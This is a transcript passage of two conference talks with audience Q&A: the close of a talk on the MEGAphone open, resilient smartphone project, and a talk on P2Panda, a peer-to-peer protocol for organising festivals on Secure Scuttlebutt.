operating system. So we can have that whole complete off-grid operation. We've already talked a little bit about having the untrustable components fully sandboxed. So, for example, the cellular modems only have an AT command serial interface to the rest of the system. And so this is going to make it much harder for an adversary to work out how with a fully compromised cellular modem, you can compromise the rest of the system by giving presumably bogus responses to AT command requests. And because we know that's where the vulnerable point is, we can put a lot of effort in our software to really interrogate the command responses that are coming back and look for any AT command responses with semi-colon drop tables and all the rest of it in there. It should be pretty straightforward to pick up. So we also have an integrated hardware and software inspector so that you can real-time verify. So this is a little bit fun. So I can hit MegaTab. And so we call it Matrix Mode, for good reason. So the system is still running in the background. So the slides are still there. So I can go back to the previous slide. I can begin to say it was a joystick actually when I'm in there. There you go. I'll file a bug for that. But we can, if I go back into it, we can look at all of memory in real-time. So if you are truly paranoid and you're about to, for example, do some encrypted email on your digitally sovereign device, you could actually go into this, stop the CPU, and then inspect every byte of memory and compare it to your physical printout of the 30 or 40 kilobytes of your software and go, what the fuck is that? Well, you might, every time you might do half a kilobyte or something, right? And verify it so that progressively over time, you've actually verified that the system is always byte identical at that point in time to what it should be doing. And again, the simplicity, we only have one program running at a time. So you know exactly what the system is doing. We can task switch. We've got a built-in freeze cartridge. If I press the restore key, anyone who's used a Commodore 64 with an action replay will probably recognize the inspired format. And so that's our program. They're running with hardware thumbnail generation. The colors are a bit wrong. We need to fix that. But we've got other software that we've had running on it. And so if we wanted to break up the presentation with a quick game of Gyrus, for example, we can do that. I need to switch the joystick port. We can do that. And then we can go back and pretend that we weren't doing anything naughty at all. And of course, I forgot to save what I was doing first, right? So I have to load the program again. So that's my bad. But that's right, because reboot time is about two seconds. Oops. So the worst part now is that we actually, we haven't got a command to jump through the slides. And so it actually takes a little bit of time for it to render each slide as we go through. So that's my punishment for not saving first. But actually, what we might do, we'll skip that for the moment. And we're kind of at the right point anyway to talk about it, which is the audio powers in a mobile phone. This is a really important area to protect. So it's so important that it's the only diagram that I've put in the entire presentation. So at the top, we have a normal mobile phone. So basically, what we see is that the untrustable cellular modem is not merely untrustable. It's like an evil squid that has tentacles that reach into every part of your mobile phone that you really don't want it getting into. So it has the direct connection to your microphone and speaker. The normal CPU on your mobile phone usually has to say, pretty please, oh, untrustable, completely untrustworthy cellular modem, may I please have something which you're going to tell me is the audio that's coming in through the microphone. Whether or not it's actually the audio or not, that's a whole separate thing. They might be doing all manner of crazy things first because you can't tell because there's a big fat black box in the way. And then just to make sure that it can fully compromise what you're doing, often it's on the same memory bus. And so you might go, oh, I'm being all secret squirrel from the cellular modem and not asking it anything. And it's just quietly lifting the covers and looking at what you've got under them going like, oh, no, no, no, that bite's wrong. You really want that value in that bite. And likewise, the RAM and the storage. So the cellular modem can totally compromise your boot loader and all of that kind of stuff along the way. Just to say that that's not really a very survivable model or a very resilient model or a very secure model for a phone. So what we have instead is that we've basically put the fully untrustable thing completely out in its own little tiny shed. We've got the tin can and string between us and it with a very controlled interface. And the microphone and speaker, thank you very much, are directly connected to our FPGA. So we can do encryption at the microphone and decryption at the speaker. And the storage is secure, so we can even have massive one-time pad. So we could actually do SIG-SELY style, provably secure communications over distance, if you can set up the key material beforehand for one-time pad. So it's a radically different approach to what we see with devices out there at the moment. So we'll just get the last few slides up again. Oh, I never got them. Oops. So even simple software can have bugs, this is where we need many eyes. Think if I load this one first, yep, and now I can load the other one, because it just hadn't loaded the fonts in. Yep, cool. That's coming. Yep. And you can even use the joystick to move around in the text if you want to. Okay. So if we think then about this whole, what are we actually trying to achieve around this, and what are some of the things that we need? And the Commodore-derived 8-bit platform, to us, has a whole pile of advantages as a basis for doing this. Now, we could have done it with a completely different platform. We're thinking like RISC-5, for example, is a nice open platform, could be an idea. That could be that the RISC-5 CPU is actually too complicated to verify and trust yourself, is my kind of view, but I'm happy that other people might disagree with me. Multiple germ lines, totally different ways of doing things, so at least one of them keeps working at any point in time would be really, really good. And we're going to show you combination things as well. One of the things we're looking at is having, for example, a Raspberry Pi running the Pi port of Android that somebody else maintains, so I don't have to do it. And then having the 8-bit layer actually virtualizing all of the I.O. around that, including access to the SD card storage, including access to the screen. And this actually also makes it possible for us to make custom mobile devices for people living with disability. And actually, so that the Android, again, is easy to maintain because we don't even have to recompile it. We can just get the standard version and then make it think it's got a normal touchscreen when in actual fact it might have some completely different input method going on. So there's a bunch of advantages, and I've run out of the official time that I allotted, so I'll quickly go through and then we'll go into questions. So the 64 platform is really well documented, so there's a whole pile of tools and everything, programming languages, so this is pretty straightforward to go through. We've already talked about capability maintenance. Again, so there's actually another key point, making the hardware big actually is a massive advantage because then we can do normal PCP fabrication. We don't have to do any BGA part placement, which is a real pain to do in your home oven, it is possible, but you don't want to have to learn how to do it in the digital winter. And yet it's actually this kind of similar size to existing kind of devices out there. So there's a bunch of advantages with that. There's a whole pile of different things that we really would like some folks to help us with to try and get this finished and out there for people to try out and to be able to mature it and make it work. So it doesn't matter whether you ever program an 8-bit computer or have ever done any FPGA work or PCB work or whatever, there's lots of space for people to join in what is quite, we think it's actually both an important and actually a really fun and enjoyable project to work on. And so really I just want to finish by saying that I think as I was thinking about this talk and preparing for it, I think actually it is a call to action. The digital autumn has begun. Digital winter is on its way. We don't know when it's going to come and it might come a lot quicker than we would really like it to come. Myself and the people who are already working on the project, we can't do everything alone. We're doing what we can. We're going to try and organize another event in early April up in Berlin. But there's no need to wait for that to get involved. We'll be around at the vintage computer area if anyone wants to come and have a look or ask anything about how you might get involved or just play around with the platform. It's quite fun to use. And yeah, we'll leave it at that point. So any questions would be really welcome. That was incredible. You have the best presenting set up that I've ever seen at the Congress. Thank you. The joystick is amazing. And the joysticks also open source hardware. I can give you the plans to make one of those yourself from parts. It's a spare joystick part for arcade games, basically. Yes, please. Yeah. Okay, we're taking questions. I remind you, we have six microphones in the audience. We also have the amazing signal angel that's going to relay questions from the Internet. And we're going to take one right now. Okay, so you already talked about some events, but maybe can you bit more elaborate on how you're planning to involve the community? Okay, so how are we going to involve the community? Basically any way the community would like to be involved, the moment in terms of with the phone is myself and kind of working at a university. And we have kind of a couple of part-time students working on things. So the bus number is disturbingly near one at the moment. So there's Ample Scope to help. We've got a few other people who are helping with the Mega 65 project itself. And so there's obviously this crossover in that. But what would be really great would be to find, for example, a couple of people who are willing to work on software, primarily coding in C. So you don't even have to know any 6502 assembler to begin with, to do things like finishing off the dialer software and things that we demonstrated back in January and get it all working so we can actually walk around with a pair of large plastic bricks by our heads talking on the phones that we've actually created. That would be a really great way to get some initial forward movement. And then things like case design. There's a whole bunch of stuff that we'd welcome involvement on. Thank you. Do we have more from the Signal Angels? Yes, we do. So OK. There's a question, when a prototype will be available? OK. When a prototype will be available, I'm happy to give out blank PCBs or post them to people. So I've got to actually pack them with me. We've got the next prototype is actually being built at the moment. So these can be built for about 400 euros at the moment. So you can buy five of these instead of an iPhone. So it's economically survivable as well in comparison. It's actually one of the really quite funny things is we're kind of making this and going like a few person years of effort and we can already make a mobile phone. OK, it's not as small and schmick, but it's got a joystick port. Does your iPhone have a joystick port? So it's amazing what we've actually been able to do quite quickly. So it's the kind of project where if we do have people kind of come in to help us, by next Congress, we ought to have people running around with megaphones and being able to communicate in fun and independent kind of ways. So yeah. Thank you. Microphone one, please. Sure. Thanks for a cool talk. And I have another question because you want to reduce black boxes, but what's about encryption because it's really complex and how do you plan to reduce this black box? OK, so an excellent question. So the best encryption there is is actually the simplest. It's called one time pad. So if you can actually meet with people. So again, if we're talking about focusing on supporting local communities, well another, if you get your megaphone and the other person's megaphone and you come in infrared range, for example, and then you shake them like martinis to generate some random data and you do that until you've decided you've got enough one time pad and that one time pad is secure enough in your device, then actually like X or is pretty easy to debug, right? Thank you. Microphone number three. So you talked about the form factor right now, the Nintendo switch. Yep. Do you have plans on going smaller than that? More like a classic mobile phone? Yeah. I think it's actually quite possible. So this is, if you like, the first version is this one. So you can see it's about five centimeters thick. The second one, we think we can get down to about four centimeters thick, but it's otherwise the same size as PCB. We've got a student at the moment who's going to try and work on making one that's about the size of only the screen, still probably about four centimeters thick. And we think that that's going to be quite, the PCB layout, he's basically been cursing me for the last three months to try and get all the tracks routing without it needing to be a 15 layer sponge-tort kind of PCB, but that should be quite possible to do. And again, that's the kind of thing, once you've got a working prototype, then some people are like, okay, we're going to be on the miniaturization team to try and make something which is even smaller. But there's always trade-offs in these things. Again, the smaller you make it, the less solar panel you can have on the back. So there's kind of these things. But certainly trying to make it as thin as we can, I think, makes a whole pile of sense. Honestly, you can make it smaller, but I don't think you should because when the zombie apocalypse happens, it's a communication tool and a weapon. Yeah, exactly. That's right. It's kind of, you know, exactly. Or you can use a full-size one as well, right? It's kind of got, you know, quite a nice solid metal keyboard in there as well. A question from the internet, please. Sure. So what do you think about the OpenMoco phone? The OpenMoco phone. So I'm trying to remember the details about those. I mean, the whole, again, everything that's being done on all of these fronts to make fully open devices with as few black boxes as possible is fantastic. So as I say, if OpenMoco can make an M.2 form factor cellular modem that we can put in the megaphone, I would be so, so happy. But we can do a whole pile of stuff while we're waiting for that to happen. Thank you. We actually had a talk yesterday about from one of the people behind the OpenMoco. So you can watch the recording if you want. Next question, microphone one. Sure. Hey, thank you for the great talk. I was interested in the Mega65 itself. Is that available? Is it sold? Yes. Okay, so the two most common questions we have about the Mega65 is, can I buy one now and how much does it cost? Unfortunately, the answer to both of those is we don't yet know exactly. It will be a three-digit number in euros for the price. This is pretty certain. But at the moment, our big challenge is we, so this one is, it's a prototype made with vacuum form molding. So each case costs upwards of 500 euros for the case. This is not really sustainable. So we know we need to make injection molding tooling for that. And so the guys from the German part of the Mega65 team are running a fundraiser. I just said to be a little bit careful with that, is that Australian law for fundraising is a bit weird. So I am not doing any fundraising. Some people here in Germany are doing some fundraising to try and raise the money for the mold. So if you look at mega65.org, you can find out what they're doing in that space and have a look at that. Thank you. Do we have more internet questions? No? Cool. Cool. I think that's it. So thank you again for the wonderful talk. My pleasure. Thank you. Thank you.
Civil society depends on the continuing ability of citizens to communicate with one another, without fear of interference, deprivation or eavesdropping. As the international political climate changes alongside that of our physical climatic environment, we must find ways to create mobile communications systems that are truly resilient and sustainable in the face of such shocks. We have therefore identified a number of freedoms that are required for resilient mobile phones: Energy, Communications, Security, Innovation, Maintenance and Scale-Dependency. These can be summarised as making it possible for people to create, maintain and develop mobile communications solutions, without requiring the capital and resources of a large company to do so. In this lecture I will explain why each of these is necessary, as well as describing how we are incorporating these principles into the MEGAphone open, resilient and secure smart-phone project. In the humanitiarian sector we talk about how without energy there is no communications, and without communications there is no organisation, and how without organisation people die. As we see increasing frequency of natural disasters, man-made disasters like wars and unrest, and the distressing intersection of these events, we have been convinced that we need to be able to create mobile communications devices that can not only survive in such events, but be sustained in the long term, and into what we call the coming Digital Winter. The Digital Winter is the situation where the freedoms to create and innovation digital systems will become impossible or highly limited due to any of various interrelated factors, such as further movement towards totalitarian governments, the failure of international supply systems (or their becoming so untrustworthy to be usable), the failure of various forms of critical infrastructure and so on. Fortunately the Digital Winter has not yet arrived, but the signs of the Digital Autumn are already upon us: The cold winds chilling our personal freedoms can already be felt in various places. Thus we have the imperative to act now, while the fruit of summer and autumn still hangs on the trees, so that we can make a harvest that will in the least sustain us through the Digital Winter with resilient, secure and sustainable communications systems, and hopefully either stave off the onset of the winter, bring it to a sooner end, and/or make the winter less bitter and destructive for the common person. It is in this context that we have begun thinking about what is necessary to achieve this, and have identified six freedoms that are required to not merely create digital solutions that can survive the Digital Winter, but hopefully allow such solutions to continue to be developed during the Digital Winter, so that we can continue to react to the storms that will come and the predators that will seek to devour our freedoms like hungry wolves. The six freedoms are: 1. Freedom from Energy Infrastructure, so that we cannot be deprived of the energy we need to communicate. 2. Freedom from Communications Infrastructure, so that we cannot be deprived of the communications we need to organise and sustain communities. 3. Freedom from depending on vendors for the security of our devices, so that we can patch security problems promptly as they emerge, so that we can sustain communications and privacy. 4. Freedom to continue to innovate and improve our digital artefacts and systems, so that we can react to emergy threats and opportunities. 5. Freedom to maintain our devices, both their hardware and software, so that our ability to communicate and organise our communities cannot be easily eroded by the passage of time. 6. Freedom from Scale-Dependency, so that individuals and small groups can fully enjoy the ability to communicate and exercise the preceding freedoms, without relying on large corporations and capital, and also allowing minimising of environmental impact. In this lecture I will explore these issues, as well as describe how we are putting them into practice to create truly resilient and sustainable mobile phones and similar devices, including in the MEGAphone open-source/open-hardware smart phone.
10.5446/53165 (DOI)
Next talk is titled P2Panda and it's about a festival organization pattern software system. We'll hear about it soon. So a festival organization is usually done by a small group and it can be decentralized. The three guys talking about P2Panda, they did organize some festivals in the past. They're going to probably talk about the festival Verantwortung 3000, which they organized. I think it's Hoffnung 3000 probably. I hope I spelled that right. The platform is used to set up groups, festivals, gatherings, art installations, stuff. What you can think about it. They will present also some fictional ideas of festivals of the future. What I really like, they will talk and tell us everything about pandas. Please give a warm round of applause to Sophie, Andreas and Vincent. Have fun. Hello. The panda, the ingenious being that wins your heart just by rolling around. Its qualities are known and appreciated. The panda is cozy. It is cuddly. It is fluffy. To talk about pandas means to talk about cuteness. It is kind and means no harm. It brings people together and won't let you down. The panda goes on adventures. The panda is cyber. Hello. We are Sophie, Vincent and Andreas. We are the Piotr Panda gang. That is a protocol for organizing festivals in a decentralized manner. We will tell you a little bit about it today. Split up this whole lecture in three parts. I will tell you a little bit about the background of Piotr Panda, its history. Then Sophie will lead over talking about the actual technical implementation of it. Vincent will end this talk with an outside future festival. One disclaimer. Everything we are going to say is the work of many, many people. We are just a part representing this group. We will only cover a small detail of it. Let's start with a history. The left you see Laura. To the right you see the panda. Laura is part of a collective named Blatt 3000. It started as a magazine in 2014 in Berlin on experimental music. We were interested in improvised contemporary music. So far we published nine magazines, made two festivals, had many release parties and gave a few lectures. Blatt 3000 consists of Laura, Malte, Sam and me. The whole magazine we started was basically circling around two questions. The first one was what happens if we don't curate at all. We just said we would publish anything people sent to us. We named that non-curation. The second thing was we encouraged people to ask questions and don't say too many answers. We asked people to write fragments or impulses we called them. To encourage people maybe to say something, I don't know, not so 100%, maybe a little bit stupid. Not to be so fixed in their position, but try something new and think about maybe things other people can then answer to in the following magazines. So this sort of format started to be some sort of platform for fictional ideas. It helped us to start dreaming about what are ways we want to make music together, what are ways to organize ourselves, what are ways to be together, all with a background of music you have to remember. We came from a musical background. We were dreaming about the festivals of the future we want to be part of, the sort of concerts we want to perform. So yeah, from all this reflection on these future ideas we also realized, I mean we are mostly from a German background, so Germans are known for being very critical and everything sucks attitude. So we were the same. We were like all these contemporary music festivals they suck, experimental music sucks, it's just conservative, it's full of guys, it's very restricted in their curation, in their juries, in their funding structures, all of this sucks. But then we actually also realized, yeah we kind of started to not go to these concerts anymore and not see this art anymore. But yeah, then we realized, okay, it's actually about the environment in which these things take place, not the art itself. The people are alright, like the music is alright, it's mostly these environments. So we started to think about, yeah what are these environments, what are these frameworks, like what is this curatorial structure, what are the juries, what is this funding and how can we hack that. So yeah, there was lots of talking in these magazines that was also boring at one point. We wanted to also experiment with actually doing something. From this point on we started to plan a festival, the first one was named for Antwortung 3000. It was like, it took place in Brandenburg on a small farm, or quite large farm actually, with 50 participants. The idea was quite simple, we just said there are as many places you can pick from. The toiletntrak, the Goetzhaus, Siminatsum, the Hof, the lake, many many beautiful places. And people could bring their resources and just share them with each other to do whatever sort of events they wanted to do. This whole thing lasted six days and was a very interesting experience for us, which we then reflected upon in the upcoming Blatrethausen magazines. So then the magazine shifted from, we publish everything to a little bit more like, okay, let's learn from what happened. And it kind of raised many many questions for many people, maybe from a few hackers in this room, they're probably used to chaotic self-organized systems for artists being in some sort of commission loop for their whole lives. That's quite new. So for many people it kind of shook, was shaking up the whole idea of how to make art actually. So these magazines became some sort of platform to reflect upon that. And this inspired us to work on the next festival. And actually for this time, under the name Hofnungen 3000, we invited other collectives to kind of think together with us what would be the festival of the future for you. Yeah, so we were asking all these people, like different collectors from different backgrounds, and it took us almost a year to plan the next platform. We built this from scratch again, like another platform. The festival took place in Berlin in 2017, this time with a smaller group, but in the middle of the city. So we had a headquarters, and one other specialty of this festival was any sort of GPS position was a potential venue. So the festival could take place in someone's apartment in the park, in professional venues, but also really anywhere. People started to join in from Tokyo, from Sardinia, from London. Anything which was a GPS position is a potential venue. I'm going to show you a little bit of the platform itself. It's up there. I'm going to have to click like that, I guess. This is the platform. I give you a small demo of what you can do. I think that gets more clear what you can do on Hofnungen 3000. You basically always start with creating resources, because this is what you're going to bring to the festival. There's the market to do that. People just bring whatever they want to share with everyone else. There's different things. It can be a skill, it can be an item, it can be something esoteric, something completely virtual. There's also somewhere, there's a panda as well. Where is it? There it is, panda and aga-aga. You can then create a place, give it a title, give it a description, upload some images, give it an address or the actual GPS position I was talking about. It doesn't work anymore. What's it? We don't use Google anymore. That's the old version. Or you can also define it as a virtual space, which was also quite interesting. Many people create a virtual space. What does that mean? It's an event happening in your head. There are some other things, like slot sizes you could define when I'm not home and all of these things. Then other people could just create events. What's the title of the event? Description, image. Where does it take place? Okay, cool. Friedrich Ludwig Jahn's Sportpark. We had a choir who made a concert there. When is it? Maybe here. Then what resources do you need? Maru de pandas. A creative human I need. A transcriber is already selected. You can also directly see what resources are occupied at this time, so you can't use them. Cool. This is then actually everything you need to make a festival, because then this event just pops up in the calendar and it's there. People can just come. This is what we've done for four days. There's some other fun features here. One is this activity stream. You see it's like an anonymized animal avatar. We were experimenting with the thing that you just don't know who you're working with. It's just a randomized animal avatar. We had a gift stream. The whole festival was documented in a series of millions of gifts. There's also a random meeting feature. If you feel bored, you can just click it and then it will put you together with random people in a random place at a random time. This is Hoffner 3000. This was what we've done in 2017. It's still being developed. You can run your own festivals with this. The source code is available under this address. We made an own page with tutorials on how to set it up and how to use it. Actually, there's also in the next year, there's two festivals happening using Hoffner 3000. The first one is the Motocool Festival in Cologne in May. The second one is the Femme Music, which is not an actual festival but a gathering of feminist activists. If you're interested, you can just write to their email. Through all of these festivals we've been doing, which were quite music focused, we realized that self-curation, decentralization, anonymization, and all of these things are not exclusively interesting for music festivals. It's more the other way around. There's communities which have been working on this for many, many, many years. For example, the hacking community, the activist communities. We started to realize, this is much more interesting than only making music festivals with this. We found that the Lieberkaus Fine in Berlin this year, where Sophie and Vincent are also part of, and Splat 3000 became the Fein's magazine. And the whole Fein is dedicated to these kind of meta questions, what are frameworks, and how can we experiment with them, what does it mean, and let's just put them into reality and see what happens. The next idea we're working on is the Piatupanda. That's the current project of the Fein, or one of the projects we're doing. And there's also the whole idea, let's bring it some steps even further and just say, how can we make the whole festival hackable? How can this whole infrastructure be hacked all the time? So we decided to build a protocol on its own, a protocol to organize resources, events, and places. We decided to build this whole thing on top of Scuttlebutt. Maybe you have heard about it, some of you probably did. It's a fantastic Piatupia social network protocol with a really beautiful community with very, very interesting and wonderful people. You can go to their tea house in Komona. And I just say a few things about Piatupanda itself, just very roughly, we're going to hear much more soon. Basically, what we're interested in in that protocol, which doesn't exist yet, we're about to start developing it. The first thing is it's peer-to-peer, so it's not running on any sort of centralized server infrastructure, which is great because you just open your laptop, you start Piatupanda, and you have a festival kind of. And it comes very close to our whole idea of non-curation. We don't want anyone to decide what this festival is, so anyone can decide at any point. Let's open our 10 laptops, and this is our festival. The next thing is it's an open protocol, so this gives us very interesting opportunities to just say, we just agree upon how we want to communicate, but not what and how the data is being displayed. So this gives completely different ideas of what a festival can be. Is it a 3D festival happening in virtual space? Is it a festival for our new bots? We don't know, and we also don't want to know. We just want people to give the opportunity to communicate with each other. And the next thing is, yeah, I mean, if you have a decentralized festival, what does it mean for in terms of temporality? Is it happening over the whole year maybe? Maybe the festival never ends. Maybe it's just different sudden bursts like occurring, and this is maybe some sort of gathering, which you could name a festival, maybe. And the next thing is we're going to learn about this soon. Because of this cryptographic features, anyone is kind of able to interact with the system, and your actions, your role in the system is defined by your actions, and not by the permissions which you were given to you. So it doesn't matter if you're an administrator, visitor, or participant. And now we're going to hear a little bit more how this actually works. So Sophie will tell you more. Thank you. APPLAUSE Okay. Thank you, Andreas. The panda goes cyber. And so, like Andreas said, I will now show you, we are still growing ideas of how we like to design and implement the protocol. We already started, but there are still lots of questions. So as said, ppanda will be a collection of tools for users, bots, and developers to set up such festivals Andreas talked about. And as he also said, it should be really simple. So one of our goals really is that everyone can use it, and it is really accessible, and you don't have to be a developer to use it. Okay. First of all, why peer-to-peer technology, and also basically what is it, I'm sure a lot of people know the term, but it's always worth it to remind yourself, I guess. Okay. Peer-to-peer or person-to-person is essentially about non-hierarchical social relations. So in technical terms, it's an infrastructure. So everyone is equally privileged, there's no server, and it's offline first. So, yeah, and it's offline first, and what also was very important for us and our decision to use a peer-to-peer protocol, that this is really independent of cloud providers. And also peer-to-peer is the relational dynamic through which people collaborate with one another to create value in the form of shared resources. And the offline first character means also that you can just start to create your content without internet connectivity. So these were really basically a lot of pros for us to choose this in the first place. Okay, let's dig a little deeper into the technical parts. What's a person, peer, or user in this context? It's basically a cryptographic key pair, like public and private key, I'm sure you know, which is generated when you open Peer-to-Panda. It's the identity of the user, and a user can be anyone, there's no distinction. It can be a visitor or an administrator, it can be a bot, it can be a person or a collective, it doesn't matter. And this user shares grades and shares events and resources. How does the user do that? So we use the secure scuttledbutt stack, which provides pent-only logs. That means that each user has a feed of messages that form this log. And everything is a message that cannot be modified once it is posted. So like here, create your resource is a message. Also, the messages reference to each other, and you have to imagine it like a chain that is forming. Everyone creates the messages on top of the other message, and on its own. And it's quite elegant to use an append-only log because it uses a conflict-free, replicated data type. So this is useful in this peer-to-peer context, or for us, for Peer-to-Panda protocol, because it prevents merge conflicts of shared messages. And as you can see, a free user does this, or forms it feeds its log on its own. And the question is, now the users in the peer-to-peer universe have to find and connect to each other. And they do this through discovery methods and replication of the messages through the Panda network. To connect to others, user broadcasts their identity to advertise their presence, basically. And then they can replicate their logs, which means they share their messages. And here an interesting effect comes from the offline-first nature of peer-to-peer. Imagine that there's a peer-to-panda event going on, and depending on your setup or internet connectivity, there are different views of this event possible. Since some users might already have posted something, but only shared that in their Spark group via Bluetooth, for example, but not with users on other places, if they were offline. So as you can see here, the yellow user has not all messages from the blue one, and the pink user doesn't have any messages from the yellow one at all. And to our mind, that could mean that there's not only one event going on, but maybe many parallel ones. And we think that this offers many possibilities for things to unfold. Okay, so now, yeah, the data types we use, and I already mentioned them, they consist basically of users, resources, and events. And at the moment, we use these notions, but we also think about other terms, because sometimes they might be a bit limiting. Anyway, to remind you, a user shares and creates events and resources. A resource in our context can be really anything, it can be a guitar, it can be a location, and an event is really basically just a set of resources. For example, a concert. So the pink event now uses the two yellow resources. And peer to panda helps users coordinate the process of mapping available resources to the events that need them. And so as you can see here, the resources might be needed at more than one event at the same time. And at this moment, we think that a request authorization process can help. And to illustrate that, I'll show you some UI examples we already thought of. So peer to panda, first of all, could have a replication health state to understand, so you can understand how well connected you are right now with others. Or it could also have a confirmation state of requested resources. And this is to indicate how much the event is progressed in its appropriations. If I want more resources for my event, I request it like so. And the other user can accept or reject by request. We think that we will initially implement the first come first served policy, where the user authorizes requests of resources, how they come in, or the system does it in an automatic way. But there are also many other possibilities you can think of, like you can let the system decide randomly. And there are also many, many other more possibilities which you can do with peer to panda. And now we'll Vincent tell you about those and the adventures and dreams and future dreams of peer to panda. Hello. Yes, so Sophie told us about the implementation and if you are a technical person, you might now imagine what the software could look like. But if you look at these building blocks that Sophie described, like the client's resources and festivals, these could be really a lot of different things. And so I want to give some examples, sometimes also referencing some of the memories that Andreas told you about in the beginning, to open up these concepts and let you dream about what else these could be. So let's start with the clients. A client, as you are probably imagining it right now, is something like an app or a website that you go to look at the far plan, the schedule of events, or to make your own event in the festival. But as the protocol offers just a data stream, a client could be a lot of other things. A client can transform data to present or preserve it in alternative ways. For example, in this conference, we are lucky to be able to look at recordings and memories from past C3 conferences. But that is not the case for a lot of other events, and it would be nice to go back a couple of years later and look at what happened. This is actually one very strong argument, I think, for peer-to-peer. It allows you to own your data again. So you have visited this event, and now the data is on your computer. You can keep it. Nobody can take it offline. Another example is that clients can also be part of the festival itself. You have all of this data available, and you can use it creatively to create installations or other apps like the wonderful C3 nav app here. And because we have a unified data model that offers these resources and users, all of these apps can reference each other, and it would be more easy to make them compatible with each other. And I think this is really one of the crucial ideas of what this is about. If you think about what is the difference between something like C3, where we are, or an event like the Fusion Festival, and other events where you have a small group of organizers that create something that is then consumed by a lot of other people, it's that these festivals or events opened up and allowed visitors, the people that come here, to transcend this passive role of just consuming and instead bring themselves into the event. And now you walk through these spaces here and you see all of the beautiful things that people have brought here. And what this does is it enables a sense of community. You're not just going to somebody else's place and looking at what they did, but you can bring yourself into it and make it part of yourself. So some other examples of clients. Andreas already spoke about the random meeting idea, and in that case it was part of the Koffnung 3000 software. But if you have an open protocol like Pier to Panda, everybody can make something like a random meeting bot. Bots could also provide data that can be used by other bots, by processing historical data or remixing data. And now if you go from clients to what are the things that you do there, you request resources in order to make sessions, make events, make workshops. In the end, Sophie shortly mentioned the possibility of, I think you mentioned, random authorization. So there could be lots of different authorization kinds. And these could enable for completely different uses also. So if you use this software as a group, you could have majority auth, where access to resources only granted when a majority of the group says, yes, this is okay. You could have random auth. You could have video auth, where you only get access to technical equipment once you have watched instructional video. Or game auth, you need to correct the high score if you want to write on my electric box something. So lots of possibilities and ways to be creative with this without asking for permission, because anybody can extend this. Now if you go to resources, what is a resource? It can be anything you bring to the venue. And we saw some great examples from what Andreas talked about. It could be cables, a teddy bear, a printer. It could also be access to a printer or a skill. Like if you're a Mime performer, I could maybe request you to assist me in this presentation and illustrate what I'm talking about. Also, I heard that Mimes are close friends of pandas. So lots of possibilities. Really interesting idea, money resource. So you could have something like a 50 euro resource, and then you say, hey, I want to make this workshop, but I need some stuff. And then you use majority auth to let the group decide whether you can use this money to do this. It could be that you need to promote your event and you get access to the homepage and the top spot in order to make your event really visible. Or maybe this is a virtual festival and the resource is just a 3D coordinate in virtual space. So now these are the things that are happening within the event, within the festival. But what is a festival? What is this? It's just a gathering of people. And of course, this is like such a basic thing that is everywhere where humans are. We always gather. And I think we can be very creative with this, if we use software to create new kinds of getting together. So for example, we could have squad conferences. You're going to some conference and you notice there's people that are interested in something and you want to get them together, but there's no space in the conference itself. Use peer to panda to make your own squad conference. It could be a conference where you don't know what you're talking about before. Or it could be a permanent festival. Like if you have a hacker space or a finance house, you can use peer to panda to give access to the resources there to everyone without having a start and end. So peer to panda is about providing decentralized infrastructure for self-organized events. And as you see now, we have tried to make this as flexible as possible in order to accommodate lots of different kinds of events. But also there are some qualities that we want to embed in the system. And here's already hinted at this. There's things like radical authorization. There's no admins that are privileged from the beginning. Everybody starts out as just a user, just a client in the system. It's offline first, so we don't bind ourselves to infrastructure and we also don't require being technically able to set up this infrastructure in order to start using peer to panda. It's an open protocol, so it can be extended and Scuttlebutt, secure Scuttlebutt also already exists. So there is already other software out there that is based on the same protocol. And this is creating an ecosystem and I think it can be just wonderful. And last but not least, computers have this rigid way where they are very precise and very ordered. But you cannot deny that in this order there's always a little bit as a spark of chaos. And yeah, we would like to use this spark to ignite a campfire for us to get cozy and tell stories to each other. Yes, and you can become peer to panda too. We have a GitHub where we have started writing the specification and we will now start implementing. Also, if you're not a technical person, you can just get in touch with us. There's a chat also linked there. And if you want to use peer to panda, we would love to support you in setting it up. And we want to create a festival and we want to invite all of you to work with us to make it happen in 2021. A festival using peer to panda organized by the Liebekauzverein. And we will have a call for our collectives for all the people that want to contribute something as a group. We will have a call for bots if you're a hacker and you want to program something, build something and play around with the system. You're all invited. And what is this? I think this is the birth of the panda. Let's watch. Oh. Oh. Oh. Thank you. Yeah, thank you very much. Get on stage. Wow. This was cool. Thank you. We have questions. So if you have questions, please line up at the microphones here in the hall and we have a question from the internet. Please. Yes. First question would be with the ephemera system. What's it take on deleting data? Was it leaking or deleting? Deleting. Just again, please. Lushen. So first of all, if you download something now and it's on your computer, then it's hard for somebody else to delete it. And this will be the same case here. Of course, it would be very impractical if there was a way to unpublish a resource or cancel an event. Okay. Thanks. Microphone one, please. Thank you for your talk. I have a very practical question. So there's resources. It's great. I can have a book. I can have stuff and all that. But my experience from like having these kind of resources, sometimes they they're not used in the way that is like well to these resources. How do you handle these kind of things? I mean, you didn't talk about these kind of like, I would say like the ugly details because yeah. Yeah, I think I think this is something like technology can't solve in a way if you could write it in a description text, like how this resource should be treated. You can, of course, you could have some sort of authorization mechanism which prepares the person to use the resource in a nice way. Like maybe you make this person watch a film for 10 hours and then you can get your book, your favorite book. It's a really important book. But I think most of all it's just the person-to-person interaction. So at one point you will meet this person at the festival and we'll hand over the book. I think that's maybe even more crucial than the actual implementation. You could be at the persons to handle it the normal way you get yourself an advocate and then you fight this through. Excuse me. I think I didn't hear it acoustically. Okay, I was just being a little bit overdoing it. So then you will do it the traditional way. You will get yourself an advocate and you will fight it through to get redemption for your book that was destroyed. Yeah, probably. So microphone two, please. I think one of the first things that I was thinking about was how this technology could help protests like in Chile and Hong Kong. Because I think this is like exactly what they need, especially when we're talking about decentralized and offline. So my question was, what's your ideas for having an offline infrastructure for peer-to-panda? Yeah, I think these thoughts came up also by other people on the way. I think it's quite, I mean, like we've seen it with similar peer-to-pia software people went to jail for the Barcelona protests. So it's a sensitive topic, I think, but source code got deleted from GitHub. But generally, I think we don't so far the Scuttlebot protocol doesn't provide 100% encryption except often private messages. So there is like things which needed to be considered. I think the Scuttlebot protocol also already has modules to allow tour, onion routing. So there's many things which could be interesting to be built into peer-to-panda as well. And I think there can be ways to make this more secure and actually really strong for these people. There's also people working right now on private groups in Scuttlebots. So it's not only like, there's actually larger groups having very secure communication. So yeah, there can be ways to think about right now. We don't include that in our thinking, but yeah, it's not out. That was not really my question. I get that this is a big concern, privacy and security, but like the infrastructure. How do these devices communicate offline? I've never heard anything about it. One way would be you could do it via Bluetooth when it's very near-field networking. And another way is to have local area networks which are not connected to the internet. Or mesh networks. Good. Microphone 1 then I think. 